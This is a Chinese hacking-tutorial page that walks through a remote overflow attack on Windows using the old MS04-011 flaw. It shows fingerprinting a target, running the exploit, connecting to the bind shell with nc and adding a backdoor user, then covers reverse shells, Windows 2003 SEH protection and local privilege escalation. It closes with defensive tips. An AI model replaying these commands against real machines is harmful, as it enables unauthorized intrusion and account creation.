系统漏洞溢出攻击实例(图)

所属分类: 网络安全 / 黑客教程 阅读数: 144
收藏 0 赞 0 分享
我们来看一下以前比较精典的一个溢出实例ms04011溢出:
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.
C:\windows\system32\cd\
C:\>
C:\>getos 2**.159.31.96 (判断操作系统)
----------------------------
THCsmbgetOS v0.1 - gets gro
by Johnny Cyberpunk (
----------------------------
[*] Connecting Port 139....
[*] Sending session request.
[*] Sending negotiation requ
[*] Sending setup account re
[*] Successful....
Remote OS:
----------
WORKGROUP
Windows 2000 LAN Manager
Windows 5.1
C:\>
C:\>ms04011 1 2**.159.31.96 (溢出格式)
shellcode size 404
Ret value = 1727
C:\>
C:\>nc 2**.159.31.96 1234 (nc进行连接)
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.
D:\WINDOWS\system32> (得到目标机shell)
D:\WINDOWS\system32>net user test test /add
net user test test /add
命令成功完成。 (建立用户)
上面只是简单演示了一下溢出过程,上例是正向溢出,只是直接溢出后用nc进行连接,还可以反向溢出,反向溢出一般用来突破防火墙,先用nc在本机监听一个端口,等待反向溢出的服务器连接过来从而得到一个system权限的shell。对于溢出还有很多,如iis、mso4045、ms04049、ms05039、ms05051、ms06061等还有一些精典的应用程序远程溢出,如未打sp3的mssql远程溢出可以直接得到系统权限。还有imail服务也一样可以通过远程溢出获得系统权限。还有很多病毒如冲击波、震荡波等病毒都是利用的rpc和lsass溢出漏洞,在感染一台机器后又不断的以此机器为节点扫描网络中的其它存在漏洞的机器进行溢出植入病毒程序,这样不断的繁殖下去。
不过在windiws2003下溢出就无用武之地了,因为在2003的保护机制里面还有一个技术是可控的SEH处理函数指针,2003中结构化异常处理例程注册后,它的函数指针会保存在模块中的一个叫Load Configuration Directory的地址列表中,如果函数返回时系统发现堆栈中的Cookie发生了改变,视为溢出,系统就会查看当前线程相关的SEH中是否有相应的处 理函数指针,有的话,系统将该指针与已经注册过函数的地址列表进行对照,如果没有发现匹配的,而且处理函数指针在堆栈中,异常处理函数就不运行。如果该处 理函数指针位于已加载的各个DLL模块地址范围只外,或堆中,处理函数会被执行,这种可控制的异常处理技术就会使传统的覆盖SEH指针的方法失败。虽然可以用已经加载模块以外的地址来覆盖SHE但在远程溢出中仍显得无力。
我们再来看看本地溢出,本地溢出主要用来进行权限提升,前面的serv-u的本地溢出已经注入中讲解了,我们现在再来看一下本地的一个特权提升漏洞,如图:

通过执行本地溢出直接从user用户提升到系统权限。
对溢出攻击的安全防范:
关闭139端口,停掉icp/ip netbios服务。
在本地连接的属性窗口中tcp/ip协议中的高级选项里“禁用tcp/ip上的netbios(s)”因为很多溢出都是利用的这个通道。
安装防火墙是必要的。
打上重要漏洞的补丁(如冲击波补丁、震荡波补丁),并开启系统的自动更新功能。
服务器使用windows2003系统。
更多精彩内容其他人还在看

黑客七大惯用攻击策略(攻击与防范)

这篇文章主要介绍了黑客七大惯用攻击策略,你必须掌握!,需要的朋友可以参考下
收藏 0 赞 0 分享

Android平台的SQL注入漏洞浅析(一条短信控制你的手机)

14年11月笔者在百度xteam博客中看到其公开了此前报告给Google的CVE-2014-8507漏洞细节——系统代码在处理经由短信承载的WAP推送内容时产生的经典SQL注入漏洞,影响Android 5.0以下的系统
收藏 0 赞 0 分享

浅析XSS与XSSI异同

这篇文章主要介绍了XSS与XSSI异同,跨站脚本(XSS)和跨站脚本包含(XSSI)之间的区别是什么?防御方法有什么不同?感兴趣的小伙伴们可以参考一下
收藏 0 赞 0 分享

没有苹果官方支持 是否可以重置MAC系统固件密码

不开源就意味着更干净更安全,现在连苹果都要准备部分开源给第三方软件了,是不是意味着苹果的安全也不如想象中的那么强大了?这个猜测并没有证据,有证据的是,iMac和MacBook的固件密码已经可以破解重置了
收藏 0 赞 0 分享

躲避黑客的七大高招教程

现在电脑用户最讨厌的就是黑客,有用户问怎么才能高效的躲避黑客的入侵呢?下面小编就为大家介绍七大高招,让你的电脑时时刻刻处于安全状态
收藏 0 赞 0 分享

在线DDoS攻击平台是什么 DDoS攻击平台的流量获取方式

流量获取是DDOS攻击的最重要一环,黑客主要通过获取厂商服务器的上行流量,致使你的服务器、电脑所属的网络或者系统资源耗尽而瘫痪,让你失去目标客户,借此用来勒索厂商。本文讲述了黑客获取流量的主要六种方式
收藏 0 赞 0 分享

如何提高DDoS攻击效率 增强DDoS攻击效果的思路

在我们的思维都朝着一个方向走的时候,忽然的转向会让人茅塞顿开。黑客在我眼中就是一群思维习惯不同的人,他们从不朝着同一个方向走,所以你才会被他们发现这么多的漏洞。一把手枪,四颗子弹,你能让子弹同时击中同一个目标来达到最强的杀伤力吗
收藏 0 赞 0 分享

十三步简单入侵个人电脑教程

下面小编就为电脑新手们打造了一个教程,从来没有通过网络进入别人电脑的用户快来看看吧,主要使用到的软件就是著名的国产木马冰河2.
收藏 0 赞 0 分享

保护DNS服务器的10点方法小结

本文收集总结了几点保护DNS服务器的有效方法,感兴趣的小伙伴们可以参考一下。
收藏 0 赞 0 分享

DNS协议欺骗攻击技术的攻防知识 DNS欺骗攻击和防范方法有哪些

你是否遭遇过这样的情况?当你在浏览器中输入正确的URL地址,但是打开的并不是你想要去的网站。它可能是114的查询页面,可能是一个广告页面,更可能是一个刷流量的页面,甚至是一个挂马的网站。如果你遇到了上述情况话,那么极有可能你遭遇了DNS欺骗。
收藏 0 赞 0 分享
查看更多